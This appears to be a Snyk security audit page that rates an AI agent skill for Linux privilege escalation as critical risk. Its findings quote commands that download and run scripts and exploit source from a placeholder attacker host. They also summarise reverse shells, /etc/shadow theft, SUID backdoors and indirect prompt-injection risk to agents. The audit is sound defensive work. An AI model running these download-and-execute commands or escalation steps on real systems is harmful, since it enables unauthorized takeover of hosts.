Skills
skills/sickn33/antigravity-awesome-skills/linux-privilege-escalation/Snyk

linux-privilege-escalation

Fail

Audited by Snyk on Jun 2, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). The list includes attacker-controlled HTTP links serving scripts/exploit source (http://ATTACKER_IP:8000/linpeas.sh and http://ATTACKER_IP/exploit.c) which are high-risk direct-downloads, while the GitHub/GTFOBins links point to legitimate privilege‑escalation tools/documentation that — although trusted sources — can be abused; overall the presence of attacker-hosted executables makes this a suspicious/malicious distribution vector.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This skill is high-risk: it provides explicit, actionable instructions for unauthorized privilege escalation and system takeover — including remote code execution (reverse shells, RCE via sudo/LD_PRELOAD/GTFOBins), credential theft and exfiltration (/etc/shadow reading and transfer), persistence and backdoors (cron, SUID binaries, PATH hijacking), kernel exploit usage, and guidance for hosting/transporting exploit payloads — all of which enable deliberate malicious abuse if used outside authorized testing.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.85). The required workflow includes fetching and executing outsider-authored free text from public web sources at runtime (e.g., curl/wget downloads linpeas.sh from GitHub and then less/./linpeas.sh ingests that script text into the agent’s execution/LLM-visible context).

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 0.90). The skill explicitly fetches and executes remote scripts during runtime (e.g., curl -L -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh and wget http://ATTACKER_IP/exploit.c followed by gcc/./exploit), meaning external content is downloaded at runtime and executed on the target.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs the agent to enumerate and exploit vulnerabilities to obtain root (including kernel exploits), modify system files (e.g., /etc/passwd, cron scripts), create SUID binaries, add users, and run reverse shells—actions that directly compromise the host state.

Issues (5)

E005
CRITICAL

Suspicious download URL detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Jun 2, 2026, 05:21 AM
Issues
5
Security Audit — snyk — linux-privilege-escalation